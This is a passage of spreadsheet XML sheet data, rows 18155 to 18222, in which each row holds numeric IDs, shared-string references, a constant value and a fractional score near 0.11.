      <c r="C18155" s="2" t="s">
        <v>17502</v>
      </c>
      <c r="D18155" s="2">
        <v>1.0</v>
      </c>
      <c r="E18155" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18155" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="18156" ht="15.75" customHeight="1">
      <c r="A18156" s="1">
        <v>30374.0</v>
      </c>
      <c r="B18156" s="2">
        <v>3.8444893E7</v>
      </c>
      <c r="C18156" s="2" t="s">
        <v>17503</v>
      </c>
      <c r="D18156" s="2">
        <v>1.0</v>
      </c>
      <c r="E18156" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18156" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="18157" ht="15.75" customHeight="1">
      <c r="A18157" s="1">
        <v>1531.0</v>
      </c>
      <c r="B18157" s="2">
        <v>2.7456155E7</v>
      </c>
      <c r="C18157" s="2" t="s">
        <v>17504</v>
      </c>
      <c r="D18157" s="2">
        <v>1.0</v>
      </c>
      <c r="E18157" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18157" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="18158" ht="15.75" customHeight="1">
      <c r="A18158" s="1">
        <v>12100.0</v>
      </c>
      <c r="B18158" s="2">
        <v>2.6751945E7</v>
      </c>
      <c r="C18158" s="2" t="s">
        <v>17505</v>
      </c>
      <c r="D18158" s="2">
        <v>1.0</v>
      </c>
      <c r="E18158" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18158" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="18159" ht="15.75" customHeight="1">
      <c r="A18159" s="1">
        <v>15314.0</v>
      </c>
      <c r="B18159" s="2">
        <v>4.2502131E7</v>
      </c>
      <c r="C18159" s="2" t="s">
        <v>17506</v>
      </c>
      <c r="D18159" s="2">
        <v>1.0</v>
      </c>
      <c r="E18159" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18159" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="18160" ht="15.75" customHeight="1">
      <c r="A18160" s="1">
        <v>16785.0</v>
      </c>
      <c r="B18160" s="2">
        <v>4.7737286E7</v>
      </c>
      <c r="C18160" s="2" t="s">
        <v>17507</v>
      </c>
      <c r="D18160" s="2">
        <v>1.0</v>
      </c>
      <c r="E18160" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18160" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="18161" ht="15.75" customHeight="1">
      <c r="A18161" s="1">
        <v>32165.0</v>
      </c>
      <c r="B18161" s="2">
        <v>5446224.0</v>
      </c>
      <c r="C18161" s="2" t="s">
        <v>17508</v>
      </c>
      <c r="D18161" s="2">
        <v>1.0</v>
      </c>
      <c r="E18161" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18161" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="18162" ht="15.75" customHeight="1">
      <c r="A18162" s="1">
        <v>8143.0</v>
      </c>
      <c r="B18162" s="2">
        <v>5.3157533E7</v>
      </c>
      <c r="C18162" s="2" t="s">
        <v>17509</v>
      </c>
      <c r="D18162" s="2">
        <v>1.0</v>
      </c>
      <c r="E18162" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18162" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="18163" ht="15.75" customHeight="1">
      <c r="A18163" s="1">
        <v>9924.0</v>
      </c>
      <c r="B18163" s="2">
        <v>5.6818173E7</v>
      </c>
      <c r="C18163" s="2" t="s">
        <v>17510</v>
      </c>
      <c r="D18163" s="2">
        <v>1.0</v>
      </c>
      <c r="E18163" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18163" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="18164" ht="15.75" customHeight="1">
      <c r="A18164" s="1">
        <v>17714.0</v>
      </c>
      <c r="B18164" s="2">
        <v>5.0595642E7</v>
      </c>
      <c r="C18164" s="2" t="s">
        <v>17511</v>
      </c>
      <c r="D18164" s="2">
        <v>1.0</v>
      </c>
      <c r="E18164" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18164" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="18165" ht="15.75" customHeight="1">
      <c r="A18165" s="1">
        <v>23777.0</v>
      </c>
      <c r="B18165" s="2">
        <v>7587794.0</v>
      </c>
      <c r="C18165" s="2" t="s">
        <v>17512</v>
      </c>
      <c r="D18165" s="2">
        <v>1.0</v>
      </c>
      <c r="E18165" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18165" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="18166" ht="15.75" customHeight="1">
      <c r="A18166" s="1">
        <v>25593.0</v>
      </c>
      <c r="B18166" s="2">
        <v>1.4365984E7</v>
      </c>
      <c r="C18166" s="2" t="s">
        <v>17513</v>
      </c>
      <c r="D18166" s="2">
        <v>1.0</v>
      </c>
      <c r="E18166" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18166" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="18167" ht="15.75" customHeight="1">
      <c r="A18167" s="1">
        <v>31916.0</v>
      </c>
      <c r="B18167" s="2">
        <v>5.3029446E7</v>
      </c>
      <c r="C18167" s="2" t="s">
        <v>17514</v>
      </c>
      <c r="D18167" s="2">
        <v>1.0</v>
      </c>
      <c r="E18167" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18167" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="18168" ht="15.75" customHeight="1">
      <c r="A18168" s="1">
        <v>11403.0</v>
      </c>
      <c r="B18168" s="2">
        <v>2.1608305E7</v>
      </c>
      <c r="C18168" s="2" t="s">
        <v>17515</v>
      </c>
      <c r="D18168" s="2">
        <v>1.0</v>
      </c>
      <c r="E18168" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18168" s="2">
        <v>0.1102693602693603</v>
      </c>
    </row>
    <row r="18169" ht="15.75" customHeight="1">
      <c r="A18169" s="1">
        <v>15875.0</v>
      </c>
      <c r="B18169" s="2">
        <v>4.4504407E7</v>
      </c>
      <c r="C18169" s="2" t="s">
        <v>17516</v>
      </c>
      <c r="D18169" s="2">
        <v>1.0</v>
      </c>
      <c r="E18169" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18169" s="2">
        <v>0.1102292768959436</v>
      </c>
    </row>
    <row r="18170" ht="15.75" customHeight="1">
      <c r="A18170" s="1">
        <v>10763.0</v>
      </c>
      <c r="B18170" s="2">
        <v>1.5591021E7</v>
      </c>
      <c r="C18170" s="2" t="s">
        <v>17517</v>
      </c>
      <c r="D18170" s="2">
        <v>1.0</v>
      </c>
      <c r="E18170" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18170" s="2">
        <v>0.1102150537634409</v>
      </c>
    </row>
    <row r="18171" ht="15.75" customHeight="1">
      <c r="A18171" s="1">
        <v>12475.0</v>
      </c>
      <c r="B18171" s="2">
        <v>2.944828E7</v>
      </c>
      <c r="C18171" s="2" t="s">
        <v>17518</v>
      </c>
      <c r="D18171" s="2">
        <v>1.0</v>
      </c>
      <c r="E18171" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18171" s="2">
        <v>0.1102150537634409</v>
      </c>
    </row>
    <row r="18172" ht="15.75" customHeight="1">
      <c r="A18172" s="1">
        <v>17306.0</v>
      </c>
      <c r="B18172" s="2">
        <v>4.9308172E7</v>
      </c>
      <c r="C18172" s="2" t="s">
        <v>17519</v>
      </c>
      <c r="D18172" s="2">
        <v>1.0</v>
      </c>
      <c r="E18172" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18172" s="2">
        <v>0.1102150537634409</v>
      </c>
    </row>
    <row r="18173" ht="15.75" customHeight="1">
      <c r="A18173" s="1">
        <v>29463.0</v>
      </c>
      <c r="B18173" s="2">
        <v>3.2314085E7</v>
      </c>
      <c r="C18173" s="2" t="s">
        <v>17520</v>
      </c>
      <c r="D18173" s="2">
        <v>1.0</v>
      </c>
      <c r="E18173" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18173" s="2">
        <v>0.1102150537634408</v>
      </c>
    </row>
    <row r="18174" ht="15.75" customHeight="1">
      <c r="A18174" s="1">
        <v>26151.0</v>
      </c>
      <c r="B18174" s="2">
        <v>1.6081449E7</v>
      </c>
      <c r="C18174" s="2" t="s">
        <v>17521</v>
      </c>
      <c r="D18174" s="2">
        <v>1.0</v>
      </c>
      <c r="E18174" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18174" s="2">
        <v>0.110200364298725</v>
      </c>
    </row>
    <row r="18175" ht="15.75" customHeight="1">
      <c r="A18175" s="1">
        <v>17791.0</v>
      </c>
      <c r="B18175" s="2">
        <v>5.0798865E7</v>
      </c>
      <c r="C18175" s="2" t="s">
        <v>17522</v>
      </c>
      <c r="D18175" s="2">
        <v>1.0</v>
      </c>
      <c r="E18175" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18175" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="18176" ht="15.75" customHeight="1">
      <c r="A18176" s="1">
        <v>27556.0</v>
      </c>
      <c r="B18176" s="2">
        <v>2.2396943E7</v>
      </c>
      <c r="C18176" s="2" t="s">
        <v>17523</v>
      </c>
      <c r="D18176" s="2">
        <v>1.0</v>
      </c>
      <c r="E18176" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18176" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="18177" ht="15.75" customHeight="1">
      <c r="A18177" s="1">
        <v>25131.0</v>
      </c>
      <c r="B18177" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C18177" s="2" t="s">
        <v>17524</v>
      </c>
      <c r="D18177" s="2">
        <v>1.0</v>
      </c>
      <c r="E18177" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18177" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="18178" ht="15.75" customHeight="1">
      <c r="A18178" s="1">
        <v>28120.0</v>
      </c>
      <c r="B18178" s="2">
        <v>2.4705152E7</v>
      </c>
      <c r="C18178" s="2" t="s">
        <v>17525</v>
      </c>
      <c r="D18178" s="2">
        <v>1.0</v>
      </c>
      <c r="E18178" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18178" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="18179" ht="15.75" customHeight="1">
      <c r="A18179" s="1">
        <v>5434.0</v>
      </c>
      <c r="B18179" s="2">
        <v>4.5584601E7</v>
      </c>
      <c r="C18179" s="2" t="s">
        <v>17526</v>
      </c>
      <c r="D18179" s="2">
        <v>1.0</v>
      </c>
      <c r="E18179" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18179" s="2">
        <v>0.1101851851851851</v>
      </c>
    </row>
    <row r="18180" ht="15.75" customHeight="1">
      <c r="A18180" s="1">
        <v>3028.0</v>
      </c>
      <c r="B18180" s="2">
        <v>3.6439647E7</v>
      </c>
      <c r="C18180" s="2" t="s">
        <v>17527</v>
      </c>
      <c r="D18180" s="2">
        <v>1.0</v>
      </c>
      <c r="E18180" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18180" s="2">
        <v>0.1101532567049809</v>
      </c>
    </row>
    <row r="18181" ht="15.75" customHeight="1">
      <c r="A18181" s="1">
        <v>214.0</v>
      </c>
      <c r="B18181" s="2">
        <v>1.4584626E7</v>
      </c>
      <c r="C18181" s="2" t="s">
        <v>17528</v>
      </c>
      <c r="D18181" s="2">
        <v>1.0</v>
      </c>
      <c r="E18181" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18181" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="18182" ht="15.75" customHeight="1">
      <c r="A18182" s="1">
        <v>14312.0</v>
      </c>
      <c r="B18182" s="2">
        <v>3.8649666E7</v>
      </c>
      <c r="C18182" s="2" t="s">
        <v>17529</v>
      </c>
      <c r="D18182" s="2">
        <v>1.0</v>
      </c>
      <c r="E18182" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18182" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="18183" ht="15.75" customHeight="1">
      <c r="A18183" s="1">
        <v>23351.0</v>
      </c>
      <c r="B18183" s="2">
        <v>5.488411E7</v>
      </c>
      <c r="C18183" s="2" t="s">
        <v>17530</v>
      </c>
      <c r="D18183" s="2">
        <v>1.0</v>
      </c>
      <c r="E18183" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18183" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="18184" ht="15.75" customHeight="1">
      <c r="A18184" s="1">
        <v>23568.0</v>
      </c>
      <c r="B18184" s="2">
        <v>6185504.0</v>
      </c>
      <c r="C18184" s="2" t="s">
        <v>17531</v>
      </c>
      <c r="D18184" s="2">
        <v>1.0</v>
      </c>
      <c r="E18184" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18184" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="18185" ht="15.75" customHeight="1">
      <c r="A18185" s="1">
        <v>25951.0</v>
      </c>
      <c r="B18185" s="2">
        <v>1.5238696E7</v>
      </c>
      <c r="C18185" s="2" t="s">
        <v>17532</v>
      </c>
      <c r="D18185" s="2">
        <v>1.0</v>
      </c>
      <c r="E18185" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18185" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="18186" ht="15.75" customHeight="1">
      <c r="A18186" s="1">
        <v>29035.0</v>
      </c>
      <c r="B18186" s="2">
        <v>3.0144842E7</v>
      </c>
      <c r="C18186" s="2" t="s">
        <v>17533</v>
      </c>
      <c r="D18186" s="2">
        <v>1.0</v>
      </c>
      <c r="E18186" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18186" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="18187" ht="15.75" customHeight="1">
      <c r="A18187" s="1">
        <v>8164.0</v>
      </c>
      <c r="B18187" s="2">
        <v>5.3209265E7</v>
      </c>
      <c r="C18187" s="2" t="s">
        <v>17534</v>
      </c>
      <c r="D18187" s="2">
        <v>1.0</v>
      </c>
      <c r="E18187" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18187" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18188" ht="15.75" customHeight="1">
      <c r="A18188" s="1">
        <v>22270.0</v>
      </c>
      <c r="B18188" s="2">
        <v>3.3163696E7</v>
      </c>
      <c r="C18188" s="2" t="s">
        <v>14783</v>
      </c>
      <c r="D18188" s="2">
        <v>1.0</v>
      </c>
      <c r="E18188" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18188" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18189" ht="15.75" customHeight="1">
      <c r="A18189" s="1">
        <v>23722.0</v>
      </c>
      <c r="B18189" s="2">
        <v>7216686.0</v>
      </c>
      <c r="C18189" s="2" t="s">
        <v>17535</v>
      </c>
      <c r="D18189" s="2">
        <v>1.0</v>
      </c>
      <c r="E18189" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18189" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18190" ht="15.75" customHeight="1">
      <c r="A18190" s="1">
        <v>27865.0</v>
      </c>
      <c r="B18190" s="2">
        <v>2.3511595E7</v>
      </c>
      <c r="C18190" s="2" t="s">
        <v>17536</v>
      </c>
      <c r="D18190" s="2">
        <v>1.0</v>
      </c>
      <c r="E18190" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18190" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18191" ht="15.75" customHeight="1">
      <c r="A18191" s="1">
        <v>29097.0</v>
      </c>
      <c r="B18191" s="2">
        <v>3.0392336E7</v>
      </c>
      <c r="C18191" s="2" t="s">
        <v>17140</v>
      </c>
      <c r="D18191" s="2">
        <v>1.0</v>
      </c>
      <c r="E18191" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18191" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18192" ht="15.75" customHeight="1">
      <c r="A18192" s="1">
        <v>29235.0</v>
      </c>
      <c r="B18192" s="2">
        <v>3.0832667E7</v>
      </c>
      <c r="C18192" s="2" t="s">
        <v>17537</v>
      </c>
      <c r="D18192" s="2">
        <v>1.0</v>
      </c>
      <c r="E18192" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18192" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18193" ht="15.75" customHeight="1">
      <c r="A18193" s="1">
        <v>33213.0</v>
      </c>
      <c r="B18193" s="2">
        <v>7216685.0</v>
      </c>
      <c r="C18193" s="2" t="s">
        <v>17535</v>
      </c>
      <c r="D18193" s="2">
        <v>1.0</v>
      </c>
      <c r="E18193" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18193" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="18194" ht="15.75" customHeight="1">
      <c r="A18194" s="1">
        <v>593.0</v>
      </c>
      <c r="B18194" s="2">
        <v>1.9197979E7</v>
      </c>
      <c r="C18194" s="2" t="s">
        <v>17538</v>
      </c>
      <c r="D18194" s="2">
        <v>1.0</v>
      </c>
      <c r="E18194" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18194" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18195" ht="15.75" customHeight="1">
      <c r="A18195" s="1">
        <v>1223.0</v>
      </c>
      <c r="B18195" s="2">
        <v>2.4941722E7</v>
      </c>
      <c r="C18195" s="2" t="s">
        <v>17539</v>
      </c>
      <c r="D18195" s="2">
        <v>1.0</v>
      </c>
      <c r="E18195" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18195" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18196" ht="15.75" customHeight="1">
      <c r="A18196" s="1">
        <v>1541.0</v>
      </c>
      <c r="B18196" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C18196" s="2" t="s">
        <v>17540</v>
      </c>
      <c r="D18196" s="2">
        <v>1.0</v>
      </c>
      <c r="E18196" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18196" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18197" ht="15.75" customHeight="1">
      <c r="A18197" s="1">
        <v>1557.0</v>
      </c>
      <c r="B18197" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C18197" s="2" t="s">
        <v>17541</v>
      </c>
      <c r="D18197" s="2">
        <v>1.0</v>
      </c>
      <c r="E18197" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18197" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18198" ht="15.75" customHeight="1">
      <c r="A18198" s="1">
        <v>2632.0</v>
      </c>
      <c r="B18198" s="2">
        <v>3.4594757E7</v>
      </c>
      <c r="C18198" s="2" t="s">
        <v>17542</v>
      </c>
      <c r="D18198" s="2">
        <v>1.0</v>
      </c>
      <c r="E18198" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18198" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18199" ht="15.75" customHeight="1">
      <c r="A18199" s="1">
        <v>3861.0</v>
      </c>
      <c r="B18199" s="2">
        <v>4.0325521E7</v>
      </c>
      <c r="C18199" s="2" t="s">
        <v>17543</v>
      </c>
      <c r="D18199" s="2">
        <v>1.0</v>
      </c>
      <c r="E18199" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18199" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18200" ht="15.75" customHeight="1">
      <c r="A18200" s="1">
        <v>5231.0</v>
      </c>
      <c r="B18200" s="2">
        <v>4.4999489E7</v>
      </c>
      <c r="C18200" s="2" t="s">
        <v>17544</v>
      </c>
      <c r="D18200" s="2">
        <v>1.0</v>
      </c>
      <c r="E18200" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18200" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18201" ht="15.75" customHeight="1">
      <c r="A18201" s="1">
        <v>5417.0</v>
      </c>
      <c r="B18201" s="2">
        <v>4.5544618E7</v>
      </c>
      <c r="C18201" s="2" t="s">
        <v>17545</v>
      </c>
      <c r="D18201" s="2">
        <v>1.0</v>
      </c>
      <c r="E18201" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18201" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18202" ht="15.75" customHeight="1">
      <c r="A18202" s="1">
        <v>5897.0</v>
      </c>
      <c r="B18202" s="2">
        <v>4.7106515E7</v>
      </c>
      <c r="C18202" s="2" t="s">
        <v>17546</v>
      </c>
      <c r="D18202" s="2">
        <v>1.0</v>
      </c>
      <c r="E18202" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18202" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18203" ht="15.75" customHeight="1">
      <c r="A18203" s="1">
        <v>6240.0</v>
      </c>
      <c r="B18203" s="2">
        <v>4.8082462E7</v>
      </c>
      <c r="C18203" s="2" t="s">
        <v>17547</v>
      </c>
      <c r="D18203" s="2">
        <v>1.0</v>
      </c>
      <c r="E18203" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18203" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18204" ht="15.75" customHeight="1">
      <c r="A18204" s="1">
        <v>6266.0</v>
      </c>
      <c r="B18204" s="2">
        <v>4.8120833E7</v>
      </c>
      <c r="C18204" s="2" t="s">
        <v>17548</v>
      </c>
      <c r="D18204" s="2">
        <v>1.0</v>
      </c>
      <c r="E18204" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18204" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18205" ht="15.75" customHeight="1">
      <c r="A18205" s="1">
        <v>7838.0</v>
      </c>
      <c r="B18205" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C18205" s="2" t="s">
        <v>17549</v>
      </c>
      <c r="D18205" s="2">
        <v>1.0</v>
      </c>
      <c r="E18205" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18205" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18206" ht="15.75" customHeight="1">
      <c r="A18206" s="1">
        <v>8003.0</v>
      </c>
      <c r="B18206" s="2">
        <v>5.2782998E7</v>
      </c>
      <c r="C18206" s="2" t="s">
        <v>17550</v>
      </c>
      <c r="D18206" s="2">
        <v>1.0</v>
      </c>
      <c r="E18206" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18206" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18207" ht="15.75" customHeight="1">
      <c r="A18207" s="1">
        <v>8107.0</v>
      </c>
      <c r="B18207" s="2">
        <v>5.3073417E7</v>
      </c>
      <c r="C18207" s="2" t="s">
        <v>17551</v>
      </c>
      <c r="D18207" s="2">
        <v>1.0</v>
      </c>
      <c r="E18207" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18207" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18208" ht="15.75" customHeight="1">
      <c r="A18208" s="1">
        <v>9280.0</v>
      </c>
      <c r="B18208" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C18208" s="2" t="s">
        <v>17552</v>
      </c>
      <c r="D18208" s="2">
        <v>1.0</v>
      </c>
      <c r="E18208" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18208" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18209" ht="15.75" customHeight="1">
      <c r="A18209" s="1">
        <v>10857.0</v>
      </c>
      <c r="B18209" s="2">
        <v>1.6309908E7</v>
      </c>
      <c r="C18209" s="2" t="s">
        <v>17553</v>
      </c>
      <c r="D18209" s="2">
        <v>1.0</v>
      </c>
      <c r="E18209" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18209" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18210" ht="15.75" customHeight="1">
      <c r="A18210" s="1">
        <v>10864.0</v>
      </c>
      <c r="B18210" s="2">
        <v>1.6381632E7</v>
      </c>
      <c r="C18210" s="2" t="s">
        <v>17554</v>
      </c>
      <c r="D18210" s="2">
        <v>1.0</v>
      </c>
      <c r="E18210" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18210" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18211" ht="15.75" customHeight="1">
      <c r="A18211" s="1">
        <v>11179.0</v>
      </c>
      <c r="B18211" s="2">
        <v>1.9738024E7</v>
      </c>
      <c r="C18211" s="2" t="s">
        <v>17555</v>
      </c>
      <c r="D18211" s="2">
        <v>1.0</v>
      </c>
      <c r="E18211" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18211" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18212" ht="15.75" customHeight="1">
      <c r="A18212" s="1">
        <v>11623.0</v>
      </c>
      <c r="B18212" s="2">
        <v>2.3116075E7</v>
      </c>
      <c r="C18212" s="2" t="s">
        <v>17556</v>
      </c>
      <c r="D18212" s="2">
        <v>1.0</v>
      </c>
      <c r="E18212" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18212" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18213" ht="15.75" customHeight="1">
      <c r="A18213" s="1">
        <v>12435.0</v>
      </c>
      <c r="B18213" s="2">
        <v>2.9233025E7</v>
      </c>
      <c r="C18213" s="2" t="s">
        <v>17557</v>
      </c>
      <c r="D18213" s="2">
        <v>1.0</v>
      </c>
      <c r="E18213" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18213" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18214" ht="15.75" customHeight="1">
      <c r="A18214" s="1">
        <v>12441.0</v>
      </c>
      <c r="B18214" s="2">
        <v>2.9266807E7</v>
      </c>
      <c r="C18214" s="2" t="s">
        <v>17558</v>
      </c>
      <c r="D18214" s="2">
        <v>1.0</v>
      </c>
      <c r="E18214" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18214" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18215" ht="15.75" customHeight="1">
      <c r="A18215" s="1">
        <v>12847.0</v>
      </c>
      <c r="B18215" s="2">
        <v>3.1767259E7</v>
      </c>
      <c r="C18215" s="2" t="s">
        <v>17559</v>
      </c>
      <c r="D18215" s="2">
        <v>1.0</v>
      </c>
      <c r="E18215" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18215" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18216" ht="15.75" customHeight="1">
      <c r="A18216" s="1">
        <v>13318.0</v>
      </c>
      <c r="B18216" s="2">
        <v>3.4584333E7</v>
      </c>
      <c r="C18216" s="2" t="s">
        <v>17560</v>
      </c>
      <c r="D18216" s="2">
        <v>1.0</v>
      </c>
      <c r="E18216" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18216" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18217" ht="15.75" customHeight="1">
      <c r="A18217" s="1">
        <v>13423.0</v>
      </c>
      <c r="B18217" s="2">
        <v>3.5073083E7</v>
      </c>
      <c r="C18217" s="2" t="s">
        <v>17561</v>
      </c>
      <c r="D18217" s="2">
        <v>1.0</v>
      </c>
      <c r="E18217" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18217" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18218" ht="15.75" customHeight="1">
      <c r="A18218" s="1">
        <v>13816.0</v>
      </c>
      <c r="B18218" s="2">
        <v>3.6707565E7</v>
      </c>
      <c r="C18218" s="2" t="s">
        <v>17562</v>
      </c>
      <c r="D18218" s="2">
        <v>1.0</v>
      </c>
      <c r="E18218" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18218" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18219" ht="15.75" customHeight="1">
      <c r="A18219" s="1">
        <v>14792.0</v>
      </c>
      <c r="B18219" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C18219" s="2" t="s">
        <v>17563</v>
      </c>
      <c r="D18219" s="2">
        <v>1.0</v>
      </c>
      <c r="E18219" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18219" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18220" ht="15.75" customHeight="1">
      <c r="A18220" s="1">
        <v>15220.0</v>
      </c>
      <c r="B18220" s="2">
        <v>4.2163472E7</v>
      </c>
      <c r="C18220" s="2" t="s">
        <v>17564</v>
      </c>
      <c r="D18220" s="2">
        <v>1.0</v>
      </c>
      <c r="E18220" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18220" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18221" ht="15.75" customHeight="1">
      <c r="A18221" s="1">
        <v>15403.0</v>
      </c>
      <c r="B18221" s="2">
        <v>4.2832816E7</v>
      </c>
      <c r="C18221" s="2" t="s">
        <v>17565</v>
      </c>
      <c r="D18221" s="2">
        <v>1.0</v>
      </c>
      <c r="E18221" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18221" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="18222" ht="15.75" customHeight="1">
      <c r="A18222" s="1">
        <v>15481.0</v>
      </c>
      <c r="B18222" s="2">
        <v>4.3179192E7</v>
      </c>
